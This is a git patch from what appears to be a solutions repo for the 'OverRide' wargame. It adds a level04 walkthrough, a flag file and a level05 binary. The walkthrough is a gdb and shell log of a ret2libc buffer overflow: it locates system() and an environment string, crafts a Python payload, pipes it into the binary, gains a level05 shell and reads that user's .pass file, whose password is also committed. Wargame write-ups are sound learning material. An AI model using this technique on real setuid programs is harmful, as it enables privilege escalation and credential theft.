From 74a150633228444208faaf08159d3188eb76d73e Mon Sep 17 00:00:00 2001 From: gbrochar Date: Mon, 12 May 2025 16:44:04 +0200 Subject: [PATCH] feat: level04 + level05 elf --- level04/Ressources/walkthrough.md | 72 ++++++++++++++++++++++++++++++ level04/flag | 1 + level05/Ressources/level05 | Bin 0 -> 5176 bytes 3 files changed, 73 insertions(+) create mode 100644 level04/Ressources/walkthrough.md create mode 100644 level04/flag create mode 100755 level05/Ressources/level05 diff --git a/level04/Ressources/walkthrough.md b/level04/Ressources/walkthrough.md new file mode 100644 index 0000000..9e48fe5 --- /dev/null +++ b/level04/Ressources/walkthrough.md @@ -0,0 +1,72 @@ +level04@OverRide:~$ export EGG=" /bin/sh" +level04@OverRide:~$ gdb level04 +bGNU gdb (Ubuntu/Linaro 7.4-2012.04-0ubuntu2.1) 7.4-2012.04 +Copyright (C) 2012 Free Software Foundation, Inc. +License GPLv3+: GNU GPL version 3 or later +This is free software: you are free to change and redistribute it. +There is NO WARRANTY, to the extent permitted by law. Type "show copying" +and "show warranty" for details. +This GDB was configured as "x86_64-linux-gnu". +For bug reporting instructions, please see: +... +Reading symbols from /home/users/level04/level04...(no debugging symbols found)...done. +(gdb) b main+150 +Function "main+150" not defined. +Make breakpoint pending on future shared library load? (y or [n]) ^Cn +(gdb) Quit +(gdb) b *main+150 +Breakpoint 1 at 0x804875e +(gdb) set follow-fork-mode child +(gdb) run +Starting program: /home/users/level04/level04 +[New process 1813] +Give me some shellcode, k +[Switching to process 1813] + +Breakpoint 1, 0x0804875e in main () +(gdb) p system +$1 = {} 0xf7e6aed0 +(gdb) p (char *)getenv("EGG") +$2 = 0xffffd857 ' ' ... +(gdb) exit +Undefined command: "exit". Try "help". +(gdb) quit +A debugging session is active. + + Inferior 2 [process 1813] will be killed. + +Quit anyway? (y or n) y +child is exiting... +level04@OverRide:~$ env +TERM=xterm-256color +SHELL=/bin/bash +SSH_CLIENT=10.0.2.2 59932 4242 +OLDPWD=/home/users/level04 +SSH_TTY=/dev/pts/0 +EGG= /bin/sh +USER=level04 +LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.dz=01;31:*.gz=01;31:*.lz=01;31:*.xz=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.jpg=01;35:*.jpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.axv=01;35:*.anx=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.axa=00;36:*.oga=00;36:*.spx=00;36:*.xspf=00;36: +MAIL=/var/mail/level04 +PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games +PWD=/home/users/level04 +LANG=en_US.UTF-8 +SHLVL=1 +HOME=/home/users/level04 +LANGUAGE=en_US:en +LOGNAME=level04 +SSH_CONNECTION=10.0.2.2 59932 10.0.2.15 4242 +LESSOPEN=| /usr/bin/lesspipe %s +LESSCLOSE=/usr/bin/lesspipe %s %s +_=/usr/bin/env +level04@OverRide:~$ python -c "print('A'*156+'\xd0\xae\xe6\xf7'+' '+'\xa0\xd8\xff\xff')" > exploit.txt +-bash: exploit.txt: Permission denied +level04@OverRide:~$ chmod +w . +level04@OverRide:~$ python -c "print('A'*156+'\xd0\xae\xe6\xf7'+' '+'\xa0\xd8\xff\xff')" > exploit.txt +level04@OverRide:~$ cat exploit.txt - | ./level04 +Give me some shellcode, k +whoami +level05 +cat /home/users/level05/.pass +3v8QLcN5SAhPaZZfEasfmXdwyR59ktDEMAwHF3aN + + diff --git a/level04/flag b/level04/flag new file mode 100644 index 0000000..f6f65e7 --- /dev/null +++ b/level04/flag @@ -0,0 +1 @@ +3v8QLcN5SAhPaZZfEasfmXdwyR59ktDEMAwHF3aN diff --git a/level05/Ressources/level05 b/level05/Ressources/level05 new file mode 100755 index 0000000000000000000000000000000000000000..b52ad99230a5327dfc28bfa6f044f0d17e010fae GIT binary patch literal 5176 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 literal 0 HcmV?d00001